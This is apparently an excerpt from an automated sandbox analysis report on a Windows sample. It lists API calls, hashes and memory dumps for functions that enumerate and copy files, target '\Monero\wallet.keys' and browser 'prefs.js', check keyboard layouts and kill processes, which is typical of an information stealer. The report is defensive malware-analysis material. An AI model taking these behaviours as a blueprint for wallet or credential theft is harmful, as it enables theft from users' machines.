                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F316B0,00F30D97), ref: 00F1F81E
                                      • StrCmpCA.SHLWAPI(?,00F316B4), ref: 00F1F86F
                                      • StrCmpCA.SHLWAPI(?,00F316B8), ref: 00F1F885
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1FBB1
                                      • FindClose.KERNEL32(000000FF), ref: 00F1FBC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: cba0966693a7bf826206b69b5275dc97d4b289163328d02bfd902c124d371deb
                                      • Instruction ID: 7ea34970a6d5bf1172f0ec397deb6fc05a1435613e5d3eccaba4087c3b7d2986
                                      • Opcode Fuzzy Hash: cba0966693a7bf826206b69b5275dc97d4b289163328d02bfd902c124d371deb
                                      • Instruction Fuzzy Hash: 99B115719001189BCB24FF64EDA6FED7379AF94300F4085A8E50A57191EF389B89DF92
                                      Function 00F11710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F3523C,?,?,?,00F352E4,?,?,00000000,?,00000000), ref: 00F11963
                                      • StrCmpCA.SHLWAPI(?,00F3538C), ref: 00F119B3
                                      • StrCmpCA.SHLWAPI(?,00F35434), ref: 00F119C9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F11D80
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F11E0A
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F11E60
                                      • FindClose.KERNEL32(000000FF), ref: 00F11E72
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 21314810c85695bd8d3ac23a2425e0da01fdf00bdf6ee1d2afdfe979aa6fc66c
                                      • Instruction ID: 497477f0e4db09972b435dd3b1acc82ec1fc0c61f8bbd71c4db383c4682fa4e5
                                      • Opcode Fuzzy Hash: 21314810c85695bd8d3ac23a2425e0da01fdf00bdf6ee1d2afdfe979aa6fc66c
                                      • Instruction Fuzzy Hash: 1812F3719501289BCB19FB60ECA6EEE7379BF54300F4045D9B50A66091EF386F88DF62
                                      Function 00F1DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00F30C32), ref: 00F1DF5E
                                      • StrCmpCA.SHLWAPI(?,00F315C0), ref: 00F1DFAE
                                      • StrCmpCA.SHLWAPI(?,00F315C4), ref: 00F1DFC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1E4E0
                                      • FindClose.KERNEL32(000000FF), ref: 00F1E4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: 01f60f6817b0647edb91a129fd19553601a320f2c169deeef8c949f417b892ad
                                      • Instruction ID: 401ff3b7dbf0f7cbf10b45f7e7db811cd4c4c9be234228d0e11a4c2c946cde13
                                      • Opcode Fuzzy Hash: 01f60f6817b0647edb91a129fd19553601a320f2c169deeef8c949f417b892ad
                                      • Instruction Fuzzy Hash: 65F1C1719101289BCB2AFB60EDA6EEE7379BF54300F4045D9B41A62091EF346F89DF52
                                      Function 0136E48C Relevance: 14.1, Strings: 10, Instructions: 1612COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: &~v$>#}k$A}~$Q*ms$RPk$jtvo$uBw$uBw$M}n$T~
                                      • API String ID: 0-1525655503
                                      • Opcode ID: a2a5df0bd5429903754bd57aa0f073d8607f9c65ef52a1224589d338452ebb70
                                      • Instruction ID: 99ed3caa3141dd99a948dd3f70ad8a3a0cf18e30e3d730c2d8e9abd44931513a
                                      • Opcode Fuzzy Hash: a2a5df0bd5429903754bd57aa0f073d8607f9c65ef52a1224589d338452ebb70
                                      • Instruction Fuzzy Hash: 62B207F3A0C2009FE3046E2DEC8566ABBE9EF98720F16493DE6C5D3744E63598058797
                                      Function 00F1DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F315A8,00F30BAF), ref: 00F1DBEB
                                      • StrCmpCA.SHLWAPI(?,00F315AC), ref: 00F1DC33
                                      • StrCmpCA.SHLWAPI(?,00F315B0), ref: 00F1DC49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1DECC
                                      • FindClose.KERNEL32(000000FF), ref: 00F1DEDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: d787fbb483ba92234279fa36b525eb0b855bf94e539a4843530a7fcc9588c1a8
                                      • Instruction ID: 42fbea11ef90c784cd13f3af3cb8e375a3fffa48f834ea92ed79f5d817187394
                                      • Opcode Fuzzy Hash: d787fbb483ba92234279fa36b525eb0b855bf94e539a4843530a7fcc9588c1a8
                                      • Instruction Fuzzy Hash: C8913572A001189BCB14FBB4EDA69ED737DAFD4304F004968F91656185EF389B48DF92
                                      Function 00F298E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F29905
                                      • Process32First.KERNEL32(00F19FDE,00000128), ref: 00F29919
                                      • Process32Next.KERNEL32(00F19FDE,00000128), ref: 00F2992E
                                      • StrCmpCA.SHLWAPI(?,00F19FDE), ref: 00F29943
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F2995C
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F2997A
                                      • CloseHandle.KERNEL32(00000000), ref: 00F29987
                                      • CloseHandle.KERNEL32(00F19FDE), ref: 00F29993
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: ad634df17ace29d747b5e0b9f619ba3eefbdd31b99e03e75231e9d4a12851b2c
                                      • Instruction ID: a7b583c002245bf69c29ad8bca5136a75cb8622a65762885c499291296e60060
                                      • Opcode Fuzzy Hash: ad634df17ace29d747b5e0b9f619ba3eefbdd31b99e03e75231e9d4a12851b2c
                                      • Instruction Fuzzy Hash: 82110A75A00218ABDB24DFE4E848BDDB7B9BB48710F00459CF519AB284DB749AC4CF90
                                      Function 00F27D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,00F305B7), ref: 00F27D71
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00F27D89
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00F27D9D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F27DF2
                                      • LocalFree.KERNEL32(00000000), ref: 00F27EB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: 79402a2bf9735224922c1e6dc316d4e097a3ab44b287ce87fc32cc4ac4b984e9
                                      • Instruction ID: e327f27b60dd68f28cc95fcd1015bdd6c87d9b72a46ab6e9deddfddb3fbecad7
                                      • Opcode Fuzzy Hash: 79402a2bf9735224922c1e6dc316d4e097a3ab44b287ce87fc32cc4ac4b984e9
                                      • Instruction Fuzzy Hash: 37414071941228ABDB24EB94EC99BEEB775FF44700F1041D9E00A66280DB746F84DFA1
                                      Function 00F1E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F30D79), ref: 00F1E5A2
                                      • StrCmpCA.SHLWAPI(?,00F315F0), ref: 00F1E5F2
                                      • StrCmpCA.SHLWAPI(?,00F315F4), ref: 00F1E608
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1ECDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 433455689-1173974218
                                      • Opcode ID: 1dec55963a2860c3cb2f0cd62b8e76d8a651543379057357f514c452d7920d5a
                                      • Instruction ID: 5c17e9f9e471560e4de8d100e0aa9579d0facb154f10bb026b6d9fd33b55ca0f
                                      • Opcode Fuzzy Hash: 1dec55963a2860c3cb2f0cd62b8e76d8a651543379057357f514c452d7920d5a
                                      • Instruction Fuzzy Hash: 8B122971A101289BCB15FB60EDA6EED73797F94300F4045E9B50A66091EF389F88DF52
                                      Function 01373567 Relevance: 9.2, Strings: 6, Instructions: 1696COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: !J]h$*,{$7=(2$K\s;$[$W$uJf
                                      • API String ID: 0-1678003702
                                      • Opcode ID: e6dcdc40ddf8d978b6103fe5ca4a1648a62ae3371ddf5ab4ad8b43a4e6ed6fc2
                                      • Instruction ID: 67ea732c5b610089946bd5c4ad46ec7b1b3a575226069e211eee410cee848b6e
                                      • Opcode Fuzzy Hash: e6dcdc40ddf8d978b6103fe5ca4a1648a62ae3371ddf5ab4ad8b43a4e6ed6fc2
                                      • Instruction Fuzzy Hash: 34B24AF360C2049FE304AE2DEC8567ABBE9EF94720F1A453DE6C4C7744EA7598058687
                                      Function 0136280D Relevance: 9.1, Strings: 6, Instructions: 1632COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
